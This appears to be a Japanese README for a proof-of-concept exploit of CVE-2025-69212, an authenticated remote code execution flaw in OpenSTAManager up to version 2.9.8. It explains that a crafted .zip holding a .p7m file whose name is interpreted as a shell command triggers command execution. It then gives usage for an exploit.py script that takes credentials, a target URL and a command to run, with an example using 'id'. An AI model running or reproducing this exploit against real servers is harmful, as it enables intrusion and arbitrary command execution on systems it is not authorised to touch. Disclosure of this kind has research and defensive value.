
CVE-2025-69212 概念実証。
OpenSTAManagerは、技術支援、電子請求書発行、会計のための管理ソフトウェアソリューションです。バージョン<=2.9.8は、認証済みリモートコード実行の脆弱性の影響を受けます。攻撃者は、シェルコマンドとして解釈される可能性のあるファイル名を持つ.p7mファイルを含む、特別に細工された.zipアーカイブをアップロードすることでこの問題を悪用し、リモートサーバー上で任意のコマンド実行を引き起こす可能性があります。
$ pip install requests
$ python3 exploit.py [-h] --user USER --password PASSWORD [--target TARGET] [--cmd CMD]
例:
$ python3 exploit.py --user="admin" --password="admin" --target="http://example.com/" --cmd="id"
-h, --help このヘルプメッセージを表示して終了します
--user USER 認証用のユーザー名。
--password PASSWORD 認証用のパスワード。
--target TARGET ターゲットドメインのエンドポイント
--cmd CMD サーバー上で実行するコマンド